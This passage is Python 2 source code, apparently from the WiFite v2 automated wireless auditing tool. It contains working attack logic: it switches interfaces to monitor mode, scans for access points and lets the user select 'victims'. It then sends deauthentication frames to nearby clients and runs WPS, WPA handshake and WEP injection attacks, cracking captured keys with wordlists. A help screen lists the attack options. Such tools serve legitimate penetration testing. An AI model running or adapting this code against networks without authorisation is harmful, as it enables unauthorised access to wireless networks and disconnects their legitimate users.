self.RUN_CONFIG.WPS_DISABLE = True elif not program_exists('walsh') and not program_exists('wash'): printed = True print R + ' [!]' + O + ' reaver\'s scanning tool ' + R + 'walsh' + O + ' (or ' + R + 'wash' + O + ') was not found' + W print R + ' [!]' + O + ' please re-install reaver or install walsh/wash separately' + W # Check handshake-checking apps recs = ['tshark', 'pyrit', 'cowpatty'] for rec in recs: if program_exists(rec): continue printed = True print R + ' [!]' + O + ' the program %s is not required, but is recommended%s' % (R + rec + O, W) if printed: print '' def enable_monitor_mode(self, iface): """ First attempts to anonymize the MAC if requested; MACs cannot be anonymized if they're already in monitor mode. Uses airmon-ng to put a device into Monitor Mode. Then uses the get_iface() method to retrieve the new interface's name. Sets global variable IFACE_TO_TAKE_DOWN as well. Returns the name of the interface in monitor mode. """ mac_anonymize(iface) print GR + ' [+]' + W + ' enabling monitor mode on %s...' % (G + iface + W), stdout.flush() call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN) print 'done' self.RUN_CONFIG.WIRELESS_IFACE = '' # remove this reference as we've started its monitoring counterpart self.RUN_CONFIG.IFACE_TO_TAKE_DOWN = self.get_iface() if self.RUN_CONFIG.TX_POWER > 0: print GR + ' [+]' + W + ' setting Tx power to %s%s%s...' % (G, self.RUN_CONFIG.TX_POWER, W), call(['iw', 'reg', 'set', 'BO'], stdout=OUTLOG, stderr=ERRLOG) call(['iwconfig', iface, 'txpower', self.RUN_CONFIG.TX_POWER], stdout=OUTLOG, stderr=ERRLOG) print 'done' return self.RUN_CONFIG.IFACE_TO_TAKE_DOWN def disable_monitor_mode(self): """ The program may have enabled monitor mode on a wireless interface. We want to disable this before we exit, so we will do that. """ if self.RUN_CONFIG.IFACE_TO_TAKE_DOWN == '': return print GR + ' [+]' + W + ' disabling monitor mode on %s...' % (G + self.RUN_CONFIG.IFACE_TO_TAKE_DOWN + W), stdout.flush() call(['airmon-ng', 'stop', self.RUN_CONFIG.IFACE_TO_TAKE_DOWN], stdout=DN, stderr=DN) print 'done' def rtl8187_fix(self, iface): """ Attempts to solve "Unknown error 132" common with RTL8187 devices. Puts down interface, unloads/reloads driver module, then puts iface back up. Returns True if fix was attempted, False otherwise. """ # Check if current interface is using the RTL8187 chipset proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN) proc_airmon.wait() using_rtl8187 = False for line in proc_airmon.communicate()[0].split(): line = line.upper() if line.strip() == '' or line.startswith('INTERFACE'): continue if line.find(iface.upper()) and line.find('RTL8187') != -1: using_rtl8187 = True if not using_rtl8187: # Display error message and exit print R + ' [!]' + O + ' unable to generate airodump-ng CSV file' + W print R + ' [!]' + O + ' you may want to disconnect/reconnect your wifi device' + W self.RUN_CONFIG.exit_gracefully(1) print O + " [!]" + W + " attempting " + O + "RTL8187 'Unknown Error 132'" + W + " fix..." original_iface = iface # Take device out of monitor mode airmon = Popen(['airmon-ng', 'stop', iface], stdout=PIPE, stderr=DN) airmon.wait() for line in airmon.communicate()[0].split('\n'): if line.strip() == '' or \ line.startswith("Interface") or \ line.find('(removed)') != -1: continue original_iface = line.split()[0] # line[:line.find('\t')] # Remove drive modules, block/unblock ifaces, probe new modules. print_and_exec(['ifconfig', original_iface, 'down']) print_and_exec(['rmmod', 'rtl8187']) print_and_exec(['rfkill', 'block', 'all']) print_and_exec(['rfkill', 'unblock', 'all']) print_and_exec(['modprobe', 'rtl8187']) print_and_exec(['ifconfig', original_iface, 'up']) print_and_exec(['airmon-ng', 'start', original_iface]) print '\r \r', print O + ' [!] ' + W + 'restarting scan...\n' return True def get_iface(self): """ Get the wireless interface in monitor mode. Defaults to only device in monitor mode if found. Otherwise, enumerates list of possible wifi devices and asks user to select one to put into monitor mode (if multiple). Uses airmon-ng to put device in monitor mode if needed. Returns the name (string) of the interface chosen in monitor mode. """ if not self.RUN_CONFIG.PRINTED_SCANNING: print GR + ' [+]' + W + ' scanning for wireless devices...' self.RUN_CONFIG.PRINTED_SCANNING = True proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN) iface = '' monitors = [] adapters = [] for line in proc.communicate()[0].split('\n'): if len(line) == 0: continue if ord(line[0]) != 32: # Doesn't start with space iface = line[:line.find(' ')] # is the interface if line.find('Mode:Monitor') != -1: monitors.append(iface) else: adapters.append(iface) if self.RUN_CONFIG.WIRELESS_IFACE != '': if monitors.count(self.RUN_CONFIG.WIRELESS_IFACE): return self.RUN_CONFIG.WIRELESS_IFACE else: if self.RUN_CONFIG.WIRELESS_IFACE in adapters: # valid adapter, enable monitor mode print R + ' [!]' + O + ' could not find wireless interface %s in monitor mode' % ( R + '"' + R + self.RUN_CONFIG.WIRELESS_IFACE + '"' + O) return self.enable_monitor_mode(self.RUN_CONFIG.WIRELESS_IFACE) else: # couldnt find the requested adapter print R + ' [!]' + O + ' could not find wireless interface %s' % ( '"' + R + self.RUN_CONFIG.WIRELESS_IFACE + O + '"' + W) self.RUN_CONFIG.exit_gracefully(0) if len(monitors) == 1: return monitors[0] # Default to only device in monitor mode elif len(monitors) > 1: print GR + " [+]" + W + " interfaces in " + G + "monitor mode:" + W for i, monitor in enumerate(monitors): print " %s. %s" % (G + str(i + 1) + W, G + monitor + W) ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s1-%d%s): %s" % \ (GR, W, G, W, G, len(monitors), W, G)) while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors): ri = raw_input("%s [+]%s select number of interface to use for capturing (%s1-%d%s): %s" % \ (GR, W, G, len(monitors), W, G)) i = int(ri) return monitors[i - 1] proc = Popen(['airmon-ng'], stdout=PIPE, stderr=DN) for line in proc.communicate()[0].split('\n'): if len(line) == 0 or line.startswith('Interface') or line.startswith('PHY'): continue monitors.append(line) if len(monitors) == 0: print R + ' [!]' + O + " no wireless interfaces were found." + W print R + ' [!]' + O + " you need to plug in a wifi device or install drivers.\n" + W self.RUN_CONFIG.exit_gracefully(0) elif self.RUN_CONFIG.WIRELESS_IFACE != '' and monitors.count(self.RUN_CONFIG.WIRELESS_IFACE) > 0: monitor = monitors[0][:monitors[0].find('\t')] return self.enable_monitor_mode(monitor) elif len(monitors) == 1: monitor = monitors[0][:monitors[0].find('\t')] if monitor.startswith('phy'): monitor = monitors[0].split()[1] return self.enable_monitor_mode(monitor) print GR + " [+]" + W + " available wireless devices:" for i, monitor in enumerate(monitors): print " %s%d%s. %s" % (G, i + 1, W, monitor) ri = raw_input( GR + " [+]" + W + " select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W)) while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors): ri = raw_input(" [+] select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W)) i = int(ri) monitor = monitors[i - 1][:monitors[i - 1].find('\t')] return self.enable_monitor_mode(monitor) def scan(self, channel=0, iface='', tried_rtl8187_fix=False): """ Scans for access points. Asks user to select target(s). "channel" - the channel to scan on, 0 scans all channels. "iface" - the interface to scan on. must be a real interface. "tried_rtl8187_fix" - We have already attempted to fix "Unknown error 132" Returns list of selected targets and list of clients. """ remove_airodump_files(self.RUN_CONFIG.temp + 'wifite') command = ['airodump-ng', '-a', # only show associated clients '-w', self.RUN_CONFIG.temp + 'wifite'] # output file if channel != 0: command.append('-c') command.append(str(channel)) command.append(iface) proc = Popen(command, stdout=DN, stderr=DN) time_started = time.time() print GR + ' [+] ' + G + 'initializing scan' + W + ' (' + G + iface + W + '), updates at 5 sec intervals, ' + G + 'CTRL+C' + W + ' when ready.' (targets, clients) = ([], []) try: deauth_sent = 0.0 old_targets = [] stop_scanning = False while True: time.sleep(0.3) if not os.path.exists(self.RUN_CONFIG.temp + 'wifite-01.csv') and time.time() - time_started > 1.0: print R + '\n [!] ERROR!' + W # RTL8187 Unknown Error 132 FIX if proc.poll() is not None: # Check if process has finished proc = Popen(['airodump-ng', iface], stdout=DN, stderr=PIPE) if not tried_rtl8187_fix and proc.communicate()[1].find('failed: Unknown error 132') != -1: send_interrupt(proc) if self.rtl8187_fix(iface): return self.scan(channel=channel, iface=iface, tried_rtl8187_fix=True) print R + ' [!]' + O + ' wifite is unable to generate airodump-ng output files' + W print R + ' [!]' + O + ' you may want to disconnect/reconnect your wifi device' + W self.RUN_CONFIG.exit_gracefully(1) (targets, clients) = self.parse_csv(self.RUN_CONFIG.temp + 'wifite-01.csv') # Remove any already cracked networks if configured to do so if self.RUN_CONFIG.SHOW_ALREADY_CRACKED == False: index = 0 while index < len(targets): already = False for cracked in self.RUN_CONFIG.CRACKED_TARGETS: if targets[index].ssid.lower() == cracked.ssid.lower(): already = True if targets[index].bssid.lower() == cracked.bssid.lower(): already = True if already == True: targets.pop(index) index -= 1 index += 1 # If we are targeting a specific ESSID/BSSID, skip the scan once we find it. if self.RUN_CONFIG.TARGET_ESSID != '': for t in targets: if t.ssid.lower() == self.RUN_CONFIG.TARGET_ESSID.lower(): send_interrupt(proc) try: os.kill(proc.pid, SIGTERM) except OSError: pass except UnboundLocalError: pass targets = [t] stop_scanning = True break if self.RUN_CONFIG.TARGET_BSSID != '': for t in targets: if t.bssid.lower() == self.RUN_CONFIG.TARGET_BSSID.lower(): send_interrupt(proc) try: os.kill(proc.pid, SIGTERM) except OSError: pass except UnboundLocalError: pass targets = [t] stop_scanning = True break # If user has chosen to target all access points, wait 20 seconds, then return all if self.RUN_CONFIG.ATTACK_ALL_TARGETS and time.time() - time_started > 10: print GR + '\n [+]' + W + ' auto-targeted %s%d%s access point%s' % ( G, len(targets), W, '' if len(targets) == 1 else 's') stop_scanning = True if self.RUN_CONFIG.ATTACK_MIN_POWER > 0 and time.time() - time_started > 10: # Remove targets with power < threshold i = 0 before_count = len(targets) while i < len(targets): if targets[i].power < self.RUN_CONFIG.ATTACK_MIN_POWER: targets.pop(i) else: i += 1 print GR + '\n [+]' + W + ' removed %s targets with power < %ddB, %s remain' % \ (G + str(before_count - len(targets)) + W, self.RUN_CONFIG.ATTACK_MIN_POWER, G + str(len(targets)) + W) stop_scanning = True if stop_scanning: break # If there are unknown SSIDs, send deauths to them. if self.RUN_CONFIG.SEND_DEAUTHS and channel != 0 and time.time() - deauth_sent > 5: deauth_sent = time.time() for t in targets: if t.ssid == '': print "\r %s deauthing hidden access point (%s) \r" % \ (GR + sec_to_hms(time.time() - time_started) + W, G + t.bssid + W), stdout.flush() # Time to deauth cmd = ['aireplay-ng', '--ignore-negative-one', '--deauth', str(self.RUN_CONFIG.WPA_DEAUTH_COUNT), '-a', t.bssid] for c in clients: if c.station == t.bssid: cmd.append('-c') cmd.append(c.bssid) break cmd.append(iface) proc_aireplay = Popen(cmd, stdout=DN, stderr=DN) proc_aireplay.wait() time.sleep(0.5) else: for ot in old_targets: if ot.ssid == '' and ot.bssid == t.bssid: print '\r %s successfully decloaked "%s" ' % \ (GR + sec_to_hms(time.time() - time_started) + W, G + t.ssid + W) old_targets = targets[:] if self.RUN_CONFIG.VERBOSE_APS and len(targets) > 0: targets = sorted(targets, key=lambda t: t.power, reverse=True) if not self.RUN_CONFIG.WPS_DISABLE: wps_check_targets(targets, self.RUN_CONFIG.temp + 'wifite-01.cap', verbose=False) os.system('clear') print GR + '\n [+] ' + G + 'scanning' + W + ' (' + G + iface + W + '), updates at 5 sec intervals, ' + G + 'CTRL+C' + W + ' when ready.\n' print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ( 'BSSID ' if self.RUN_CONFIG.SHOW_MAC_IN_SCAN else '') print ' --- -------------------- %s-- ---- ----- ---- ------' % ( '----------------- ' if self.RUN_CONFIG.SHOW_MAC_IN_SCAN else '') for i, target in enumerate(targets): print " %s%2d%s " % (G, i + 1, W), # SSID if target.ssid == '': p = O + '(' + target.bssid + ')' + GR + ' ' + W print '%s' % p.ljust(20), elif ( target.ssid.count('\x00') == len(target.ssid) ): p = '' print '%s' % C + p.ljust(20) + W, elif len(target.ssid) <= 20: print "%s" % C + target.ssid.ljust(20) + W, else: print "%s" % C + target.ssid[0:17] + '...' + W, # BSSID if self.RUN_CONFIG.SHOW_MAC_IN_SCAN: print O, target.bssid + W, # Channel print G + target.channel.rjust(3), W, # Encryption if target.encryption.find("WEP") != -1: print G, else: print O, print "\b%3s" % target.encryption.strip().ljust(4) + W, # Power if target.power >= 55: col = G elif target.power >= 40: col = O else: col = R print "%s%3ddb%s" % (col, target.power, W), # WPS if self.RUN_CONFIG.WPS_DISABLE: print " %3s" % (O + 'n/a' + W), else: print " %3s" % (G + 'wps' + W if target.wps else R + ' no' + W), # Clients client_text = '' for c in clients: if c.station == target.bssid: if client_text == '': client_text = 'client' elif client_text[-1] != "s": client_text += "s" if client_text != '': print ' %s' % (G + client_text + W) else: print '' print '' print ' %s %s wireless networks. %s target%s and %s client%s found \r' % ( GR + sec_to_hms(time.time() - time_started) + W, G + 'scanning' + W, G + str(len(targets)) + W, '' if len(targets) == 1 else 's', G + str(len(clients)) + W, '' if len(clients) == 1 else 's'), stdout.flush() except KeyboardInterrupt: pass print '' send_interrupt(proc) try: os.kill(proc.pid, SIGTERM) except OSError: pass except UnboundLocalError: pass # Use "wash" program to check for WPS compatibility if not self.RUN_CONFIG.WPS_DISABLE: wps_check_targets(targets, self.RUN_CONFIG.temp + 'wifite-01.cap') remove_airodump_files(self.RUN_CONFIG.temp + 'wifite') if stop_scanning: return (targets, clients) print '' if len(targets) == 0: print R + ' [!]' + O + ' no targets found!' + W print R + ' [!]' + O + ' you may need to wait for targets to show up.' + W print '' self.RUN_CONFIG.exit_gracefully(1) if self.RUN_CONFIG.VERBOSE_APS: os.system('clear') # Sort by Power targets = sorted(targets, key=lambda t: t.power, reverse=True) victims = [] print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ( 'BSSID ' if self.RUN_CONFIG.SHOW_MAC_IN_SCAN else '') print ' --- -------------------- %s-- ---- ----- ---- ------' % ( '----------------- ' if self.RUN_CONFIG.SHOW_MAC_IN_SCAN else '') for i, target in enumerate(targets): print " %s%2d%s " % (G, i + 1, W), # SSID if target.ssid == '': p = O + '(' + target.bssid + ')' + GR + ' ' + W print '%s' % p.ljust(20), elif ( target.ssid.count('\x00') == len(target.ssid) ): p = '' print '%s' % C + p.ljust(20) + W, elif len(target.ssid) <= 20: print "%s" % C + target.ssid.ljust(20) + W, else: print "%s" % C + target.ssid[0:17] + '...' + W, # BSSID if self.RUN_CONFIG.SHOW_MAC_IN_SCAN: print O, target.bssid + W, # Channel print G + target.channel.rjust(3), W, # Encryption if target.encryption.find("WEP") != -1: print G, else: print O, print "\b%3s" % target.encryption.strip().ljust(4) + W, # Power if target.power >= 55: col = G elif target.power >= 40: col = O else: col = R print "%s%3ddb%s" % (col, target.power, W), # WPS if self.RUN_CONFIG.WPS_DISABLE: print " %3s" % (O + 'n/a' + W), else: print " %3s" % (G + 'wps' + W if target.wps else R + ' no' + W), # Clients client_text = '' for c in clients: if c.station == target.bssid: if client_text == '': client_text = 'client' elif client_text[-1] != "s": client_text += "s" if client_text != '': print ' %s' % (G + client_text + W) else: print '' ri = raw_input( GR + "\n [+]" + W + " select " + G + "target numbers" + W + " (" + G + "1-%s)" % (str(len(targets)) + W) + \ " separated by commas, or '%s': " % (G + 'all' + W)) if ri.strip().lower() == 'all': victims = targets[:] else: for r in ri.split(','): r = r.strip() if r.find('-') != -1: (sx, sy) = r.split('-') if sx.isdigit() and sy.isdigit(): x = int(sx) y = int(sy) + 1 for v in xrange(x, y): victims.append(targets[v - 1]) elif not r.isdigit() and r.strip() != '': print O + " [!]" + R + " not a number: %s " % (O + r + W) elif r != '': victims.append(targets[int(r) - 1]) if len(victims) == 0: print O + '\n [!] ' + R + 'no targets selected.\n' + W self.RUN_CONFIG.exit_gracefully(0) print '' print ' [+] %s%d%s target%s selected.' % (G, len(victims), W, '' if len(victims) == 1 else 's') return (victims, clients) def Start(self): self.RUN_CONFIG.CreateTempFolder() self.RUN_CONFIG.handle_args() self.RUN_CONFIG.ConfirmRunningAsRoot() self.RUN_CONFIG.ConfirmCorrectPlatform() self.initial_check() # Ensure required programs are installed. # Use an interface already in monitor mode if it has been provided, if self.RUN_CONFIG.MONITOR_IFACE != '': iface = self.RUN_CONFIG.MONITOR_IFACE else: # The "get_iface" method anonymizes the MAC address (if needed) # and puts the interface into monitor mode. iface = self.get_iface() self.RUN_CONFIG.THIS_MAC = get_mac_address(iface) # Store current MAC address (targets, clients) = self.scan(iface=iface, channel=self.RUN_CONFIG.TARGET_CHANNEL) try: index = 0 while index < len(targets): target = targets[index] # Check if we have already cracked this target for already in RUN_CONFIG.CRACKED_TARGETS: if already.bssid == targets[index].bssid: if RUN_CONFIG.SHOW_ALREADY_CRACKED == True: print R + '\n [!]' + O + ' you have already cracked this access point\'s key!' + W print R + ' [!] %s' % (C + already.ssid + W + ': "' + G + already.key + W + '"') ri = raw_input( GR + ' [+] ' + W + 'do you want to crack this access point again? (' + G + 'y/' + O + 'n' + W + '): ') if ri.lower() == 'n': targets.pop(index) index -= 1 else: targets.pop(index) index -= 1 break # Check if handshakes already exist, ask user whether to skip targets or save new handshakes handshake_file = RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \ + '_' + target.bssid.replace(':', '-') + '.cap' if os.path.exists(handshake_file): print R + '\n [!] ' + O + 'you already have a handshake file for %s:' % (C + target.ssid + W) print ' %s\n' % (G + handshake_file + W) print GR + ' [+]' + W + ' do you want to ' + G + '[s]kip' + W + ', ' + O + '[c]apture again' + W + ', or ' + R + '[o]verwrite' + W + '?' ri = 'x' while ri != 's' and ri != 'c' and ri != 'o': ri = raw_input( GR + ' [+] ' + W + 'enter ' + G + 's' + W + ', ' + O + 'c,' + W + ' or ' + R + 'o' + W + ': ' + G).lower() print W + "\b", if ri == 's': targets.pop(index) index -= 1 elif ri == 'o': remove_file(handshake_file) continue index += 1 except KeyboardInterrupt: print '\n ' + R + '(^C)' + O + ' interrupted\n' self.RUN_CONFIG.exit_gracefully(0) wpa_success = 0 wep_success = 0 wpa_total = 0 wep_total = 0 self.RUN_CONFIG.TARGETS_REMAINING = len(targets) for t in targets: self.RUN_CONFIG.TARGETS_REMAINING -= 1 # Build list of clients connected to target ts_clients = [] for c in clients: if c.station == t.bssid: ts_clients.append(c) print '' if t.encryption.find('WPA') != -1: need_handshake = True if not self.RUN_CONFIG.WPS_DISABLE and t.wps: wps_attack = WPSAttack(iface, t, self.RUN_CONFIG) need_handshake = not wps_attack.RunAttack() wpa_total += 1 if not need_handshake: wpa_success += 1 if self.RUN_CONFIG.TARGETS_REMAINING < 0: break if not self.RUN_CONFIG.PIXIE and not self.RUN_CONFIG.WPA_DISABLE and need_handshake: wpa_total += 1 wpa_attack = WPAAttack(iface, t, ts_clients, self.RUN_CONFIG) if wpa_attack.RunAttack(): wpa_success += 1 elif t.encryption.find('WEP') != -1: wep_total += 1 wep_attack = WEPAttack(iface, t, ts_clients, self.RUN_CONFIG) if wep_attack.RunAttack(): wep_success += 1 else: print R + ' unknown encryption:', t.encryption, W # If user wants to stop attacking if self.RUN_CONFIG.TARGETS_REMAINING <= 0: break if wpa_total + wep_total > 0: # Attacks are done! Show results to user print '' print GR + ' [+] %s%d attack%s completed:%s' % ( G, wpa_total + wep_total, '' if wpa_total + wep_total == 1 else 's', W) print '' if wpa_total > 0: if wpa_success == 0: print GR + ' [+]' + R, elif wpa_success == wpa_total: print GR + ' [+]' + G, else: print GR + ' [+]' + O, print '%d/%d%s WPA attacks succeeded' % (wpa_success, wpa_total, W) for finding in self.RUN_CONFIG.WPA_FINDINGS: print ' ' + C + finding + W if wep_total > 0: if wep_success == 0: print GR + ' [+]' + R, elif wep_success == wep_total: print GR + ' [+]' + G, else: print GR + ' [+]' + O, print '%d/%d%s WEP attacks succeeded' % (wep_success, wep_total, W) for finding in self.RUN_CONFIG.WEP_FINDINGS: print ' ' + C + finding + W caps = len(self.RUN_CONFIG.WPA_CAPS_TO_CRACK) if caps > 0 and not self.RUN_CONFIG.WPA_DONT_CRACK: print GR + ' [+]' + W + ' starting ' + G + 'WPA cracker' + W + ' on %s%d handshake%s' % ( G, caps, W if caps == 1 else 's' + W) for cap in self.RUN_CONFIG.WPA_CAPS_TO_CRACK: wpa_crack(cap, self.RUN_CONFIG) print '' self.RUN_CONFIG.exit_gracefully(0) def parse_csv(self, filename): """ Parses given lines from airodump-ng CSV file. Returns tuple: List of targets and list of clients. """ if not os.path.exists(filename): return ([], []) targets = [] clients = [] try: hit_clients = False with open(filename, 'rb') as csvfile: targetreader = csv.reader((line.replace('\0', '') for line in csvfile), delimiter=',') for row in targetreader: if len(row) < 2: continue if not hit_clients: if row[0].strip() == 'Station MAC': hit_clients = True continue if len(row) < 14: continue if row[0].strip() == 'BSSID': continue enc = row[5].strip() wps = False # Ignore non-WPA and non-WEP encryption if enc.find('WPA') == -1 and enc.find('WEP') == -1: continue if self.RUN_CONFIG.WEP_DISABLE and enc.find('WEP') != -1: continue if self.RUN_CONFIG.WPA_DISABLE and self.RUN_CONFIG.WPS_DISABLE and enc.find( 'WPA') != -1: continue if enc == "WPA2WPA" or enc == "WPA2 WPA": enc = "WPA2" wps = True if len(enc) > 4: enc = enc[4:].strip() power = int(row[8].strip()) ssid = row[13].strip() ssidlen = int(row[12].strip()) ssid = ssid[:ssidlen] if power < 0: power += 100 t = Target(row[0].strip(), power, row[10].strip(), row[3].strip(), enc, ssid) t.wps = wps targets.append(t) else: if len(row) < 6: continue bssid = re.sub(r'[^a-zA-Z0-9:]', '', row[0].strip()) station = re.sub(r'[^a-zA-Z0-9:]', '', row[5].strip()) power = row[3].strip() if station != 'notassociated': c = Client(bssid, station, power) clients.append(c) except IOError as e: print "I/O error({0}): {1}".format(e.errno, e.strerror) return ([], []) return (targets, clients) def analyze_capfile(self, capfile): """ Analyzes given capfile for handshakes using various programs. Prints results to console. """ # we're not running an attack wpa_attack = WPAAttack(None, None, None, None) if self.RUN_CONFIG.TARGET_ESSID == '' and self.RUN_CONFIG.TARGET_BSSID == '': print R + ' [!]' + O + ' target ssid and bssid are required to check for handshakes' print R + ' [!]' + O + ' please enter essid (access point name) using -e ' print R + ' [!]' + O + ' and/or target bssid (mac address) using -b \n' # exit_gracefully(1) if self.RUN_CONFIG.TARGET_BSSID == '': # Get the first BSSID found in tshark! self.RUN_CONFIG.TARGET_BSSID = get_bssid_from_cap(self.RUN_CONFIG.TARGET_ESSID, capfile) # if TARGET_BSSID.find('->') != -1: TARGET_BSSID == '' if self.RUN_CONFIG.TARGET_BSSID == '': print R + ' [!]' + O + ' unable to guess BSSID from ESSID!' else: print GR + ' [+]' + W + ' guessed bssid: %s' % (G + self.RUN_CONFIG.TARGET_BSSID + W) if self.RUN_CONFIG.TARGET_BSSID != '' and self.RUN_CONFIG.TARGET_ESSID == '': self.RUN_CONFIG.TARGET_ESSID = get_essid_from_cap(self.RUN_CONFIG.TARGET_BSSID, capfile) print GR + '\n [+]' + W + ' checking for handshakes in %s' % (G + capfile + W) t = Target(self.RUN_CONFIG.TARGET_BSSID, '', '', '', 'WPA', self.RUN_CONFIG.TARGET_ESSID) if program_exists('pyrit'): result = wpa_attack.has_handshake_pyrit(t, capfile) print GR + ' [+]' + W + ' ' + G + 'pyrit' + W + ':\t\t\t %s' % ( G + 'found!' + W if result else O + 'not found' + W) else: print R + ' [!]' + O + ' program not found: pyrit' if program_exists('cowpatty'): result = wpa_attack.has_handshake_cowpatty(t, capfile, nonstrict=True) print GR + ' [+]' + W + ' ' + G + 'cowpatty' + W + ' (nonstrict):\t %s' % ( G + 'found!' + W if result else O + 'not found' + W) result = wpa_attack.has_handshake_cowpatty(t, capfile, nonstrict=False) print GR + ' [+]' + W + ' ' + G + 'cowpatty' + W + ' (strict):\t %s' % ( G + 'found!' + W if result else O + 'not found' + W) else: print R + ' [!]' + O + ' program not found: cowpatty' if program_exists('tshark'): result = wpa_attack.has_handshake_tshark(t, capfile) print GR + ' [+]' + W + ' ' + G + 'tshark' + W + ':\t\t\t %s' % ( G + 'found!' + W if result else O + 'not found' + W) else: print R + ' [!]' + O + ' program not found: tshark' if program_exists('aircrack-ng'): result = wpa_attack.has_handshake_aircrack(t, capfile) print GR + ' [+]' + W + ' ' + G + 'aircrack-ng' + W + ':\t\t %s' % ( G + 'found!' + W if result else O + 'not found' + W) else: print R + ' [!]' + O + ' program not found: aircrack-ng' print '' self.RUN_CONFIG.exit_gracefully(0) ################## # MAIN FUNCTIONS # ################## ############################################################## ### End Classes def rename(old, new): """ Renames file 'old' to 'new', works with separate partitions. Thanks to hannan.sadar """ try: os.rename(old, new) except os.error, detail: if detail.errno == errno.EXDEV: try: copy(old, new) except: os.unlink(new) raise os.unlink(old) # if desired, deal with other errors else: raise def banner(RUN_CONFIG): """ Displays ASCII art of the highest caliber. """ print '' print G + " .;' `;, " print G + " .;' ,;' `;, `;, " + W + "WiFite v2 (r" + str(RUN_CONFIG.REVISION) + ")" print G + ".;' ,;' ,;' `;, `;, `;, " print G + ":: :: : " + GR + "( )" + G + " : :: :: " + GR + "automated wireless auditor" print G + "':. ':. ':. " + GR + "/_\\" + G + " ,:' ,:' ,:' " print G + " ':. ':. " + GR + "/___\\" + G + " ,:' ,:' " + GR + "designed for Linux" print G + " ':. " + GR + "/_____\\" + G + " ,:' " print G + " " + GR + "/ \\" + G + " " print W def get_revision(): """ Gets latest revision # from the GitHub repository Returns : revision# """ irev = -1 try: sock = urllib.urlopen('https://github.com/derv82/wifite/raw/master/wifite.py') page = sock.read() except IOError: return (-1, '', '') # get the revision start = page.find('REVISION = ') stop = page.find(";", start) if start != -1 and stop != -1: start += 11 rev = page[start:stop] try: irev = int(rev) except ValueError: rev = rev.split('\n')[0] print R + '[+] invalid revision number: "' + rev + '"' return irev def help(): """ Prints help screen """ head = W sw = G var = GR des = W de = G print head + ' COMMANDS' + W print sw + '\t-check ' + var + '\t' + des + 'check capfile ' + var + '' + des + ' for handshakes.' + W print sw + '\t-cracked \t' + des + 'display previously-cracked access points' + W print sw + '\t-recrack \t' + des + 'allow recracking of previously cracked access points' + W print '' print head + ' GLOBAL' + W print sw + '\t-all \t' + des + 'attack all targets. ' + de + '[off]' + W #print sw+'\t-pillage \t'+des+'attack all targets in a looping fashion.'+de+'[off]'+W print sw + '\t-i ' + var + ' \t' + des + 'wireless interface for capturing ' + de + '[auto]' + W print sw + '\t-mon-iface ' + var + ' \t' + des + 'interface in monitor mode for capturing ' + de + '[auto]' + W print sw + '\t-mac \t' + des + 'anonymize mac address ' + de + '[off]' + W print sw + '\t-c ' + var + '\t' + des + 'channel to scan for targets ' + de + '[auto]' + W print sw + '\t-e ' + var + ' \t' + des + 'target a specific access point by ssid (name) ' + de + '[ask]' + W print sw + '\t-b ' + var + ' \t' + des + 'target a specific access point by bssid (mac) ' + de + '[auto]' + W print sw + '\t-showb \t' + des + 'display target BSSIDs after scan ' + de + '[off]' + W print sw + '\t-pow ' + var + ' \t' + des + 'attacks any targets with signal strenghth > ' + var + 'db ' + de + '[0]' + W print sw + '\t-quiet \t' + des + 'do not print list of APs during scan ' + de + '[off]' + W print '' print head + '\n WPA' + W print sw + '\t-wpa \t' + des + 'only target WPA networks (works with -wps -wep) ' + de + '[off]' + W print sw + '\t-wpat ' + var + ' \t' + des + 'time to wait for WPA attack to complete (seconds) ' + de + '[500]' + W print sw + '\t-wpadt ' + var + ' \t' + des + 'time to wait between sending deauth packets (sec) ' + de + '[10]' + W print sw + '\t-strip \t' + des + 'strip handshake using tshark or pyrit ' + de + '[off]' + W print sw + '\t-crack ' + var + '\t' + des + 'crack WPA handshakes using ' + var + '' + des + ' wordlist file ' + de + '[off]' + W print sw + '\t-dict ' + var + '\t' + des + 'specify dictionary to use when cracking WPA ' + de + '[phpbb.txt]' + W print sw + '\t-aircrack \t' + des + 'verify handshake using aircrack ' + de + '[on]' + W print sw + '\t-pyrit \t' + des + 'verify handshake using pyrit ' + de + '[off]' + W print sw + '\t-tshark \t' + des + 'verify handshake using tshark ' + de + '[on]' + W print sw + '\t-cowpatty \t' + des + 'verify handshake using cowpatty ' + de + '[off]' + W print head + '\n WEP' + W print sw + '\t-wep \t' + des + 'only target WEP networks ' + de + '[off]' + W print sw + '\t-pps ' + var + ' \t' + des + 'set the number of packets per second to inject ' + de + '[600]' + W print sw + '\t-wept ' + var + ' \t' + des + 'sec to wait for each attack, 0 implies endless ' + de + '[600]' + W print sw + '\t-chopchop \t' + des + 'use chopchop attack ' + de + '[on]' + W print sw + '\t-arpreplay \t' + des + 'use arpreplay attack ' + de + '[on]' + W print sw + '\t-fragment \t' + des + 'use fragmentation attack ' + de + '[on]' + W print sw + '\t-caffelatte \t' + des + 'use caffe-latte attack ' + de + '[on]' + W print sw + '\t-p0841 \t' + des + 'use -p0841 attack ' + de + '[on]' + W print sw + '\t-hirte \t' + des + 'use hirte (cfrag) attack ' + de + '[on]' + W print sw + '\t-nofakeauth \t' + des + 'stop attack if fake authentication fails ' + de + '[off]' + W print sw + '\t-wepca ' + GR + ' \t' + des + 'start cracking when number of ivs surpass n ' + de + '[10000]' + W print sw + '\t-wepsave \t' + des + 'save a copy of .cap files to this directory ' + de + '[off]' + W print head + '\n WPS' + W print sw + '\t-wps \t' + des + 'only target WPS networks ' + de + '[off]' + W print sw + '\t-wpst ' + var + ' \t' + des + 'max wait for new retry before giving up (0: never) ' + de + '[660]' + W print sw + '\t-wpsratio ' + var + '\t' + des + 'min ratio of successful PIN attempts/total tries ' + de + '[0]' + W print sw + '\t-wpsretry ' + var + '\t' + des + 'max number of retries for same PIN before giving up ' + de + '[0]' + W print head + '\n EXAMPLE' + W print sw + '\t./wifite.py ' + W + '-wps -wep -c 6 -pps 600' + W print '' ########################### # WIRELESS CARD FUNCTIONS # ########################### ###################### # SCANNING 